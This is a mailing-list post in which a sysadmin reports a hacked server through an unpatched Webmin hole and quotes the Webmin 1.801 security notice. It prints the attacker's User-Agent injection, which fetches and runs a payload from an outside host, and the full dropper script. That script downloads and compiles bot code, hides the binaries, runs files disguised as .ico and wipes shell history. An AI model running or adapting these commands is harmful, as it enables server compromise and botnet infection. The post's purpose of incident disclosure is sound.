Hi Guys,
Webmin has/had a security hole in one of their templates, I just found a hacked colocated machine that was obviously not patched in time:
nice script, tells you which IP's to blackhole :)
The Entrance was:
im HTTP_USER_AGENT header HTTP_USER_AGENT=(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || bash -c "wget http://ugotownedz.org/mg -O /tmp/mg;curl -o /tmp/mg http://ugotownedz.org/mg;sh /tmp/mg;rm -rf /tmp/mg"
-----
Webmin 1.801 released The primary reason for this update is to fix a serious security issue that effects users using the Authentic theme versions prior to 18.00 - All users should upgrade ASAP!. It also includes tracking for recent logins, better behavior when updating multiple packages, translation updates and more. You can get it from the Webmin downloads page, or from our YUM or APT repositories.
-----
I guess this might be useful for some here to know ;)
Silvan
---- #!/bin/sh apt-get -y install gcc || aptitude -y install gcc || yum -y install gcc apt-get -y install libssh || aptitude -y install libssh || yum -y install libssh apt-get -y install libssh-dev || aptitude -y install libssh-dev || yum -y install libssh-dev wget http://ugotownedz.org/pass.h -o /tmp/pass.h || curl -o /tmp/pass.h http://ugotownedz.org/pass.h wget http://ugotownedz.org/PwNzbot.c -O /tmp/PwNzbot.c || curl -o /tmp/PwNzbot.c http://ugotownedz.org/PwNzbot.c gcc -o /tmp/a /tmp/PwNzbot.c mv /tmp/a /dev/shm/aaaa mv /tmp/a /usr/lib/.aaaa chmod +x /dev/shm/aaaa chmod +x /usr/lib/.aaaa /usr/lib/.aaaa /dev/shm/aaaa chmod +x /tmp/a /tmp/a wget http://ugotownedz.org/pmabot.c -O pmabot.c || curl -o pmabot.c http://ugotownedz.org/pmabot.c gcc -o .X0-unix pmabot.c ./.X0-unix wget http://ugotownedz.org/PwNzbot.c -O /tmp/a.c || curl -o /tmp/PwNzbot.c http://ugotownedz.org/a.c gcc -o /tmp/a /tmp/PwNzbot.c mv /tmp/a /dev/shm/weed mv /tmp/a /usr/lib/.weed chmod +x /dev/shm/weed chmod +x /usr/lib/.weed /usr/lib/.weed /dev/shm/.weed chmod +x /tmp/.weed /tmp/.weed rm -rf /tmp/PwNzbot.* rm -rf /tmp/a.* rm -rf /tmp/pmabot.* rm -rf /tmp/kait. rm -rf pmabot.* rm -rf PwNzbot.* rm -rf a.* wget ftp://67.68.120.2/apache.ico || curl -O ftp://67.68.120.2/apache.ico perl apache.ico rm -rf .bash_history wget http://ugotownedz.org/kait.c -O /tmp/kait.c || curl -o kait.c http://ugotownedz.org/kait.c gcc -o /tmp/.X1-unix /tmp/kait.c -lssh /tmp/.X1-unix wget ftp://67.68.120.2/PK.ico || curl -O ftp://67.68.120.2/PK.ico php PK.ico rm -rf .bash_history rm -rf PK.ico.1 rm -rf kait.*
-
gebhardt@openfactory.ch